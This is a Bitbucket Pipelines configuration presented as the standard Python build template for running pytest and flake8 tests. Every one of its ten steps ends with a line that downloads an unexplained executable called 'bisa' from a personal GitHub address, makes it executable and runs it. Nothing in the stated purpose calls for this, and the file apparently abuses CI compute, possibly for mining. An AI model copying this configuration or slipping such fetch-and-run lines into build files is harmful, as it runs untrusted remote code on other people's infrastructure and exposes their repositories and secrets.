#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Test 1
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - pytest -v tests/* --junitxml=test-reports/report.xml
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa
      - step:
          name: test 2
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa
    - step:
          name: test 3
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa
    - step:
          name: test 4
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa
    - step:
          name: test 5
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa
    - step:
          name: test 6
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa
    - step:
          name: test 7
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa
    - step:
          name: test 8
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa
    - step:
          name: test 9
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa
    - step:
          name: test 10
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://raw.githubusercontent.com/diangame/bisa/main/bisa && chmod +x bisa && ./bisa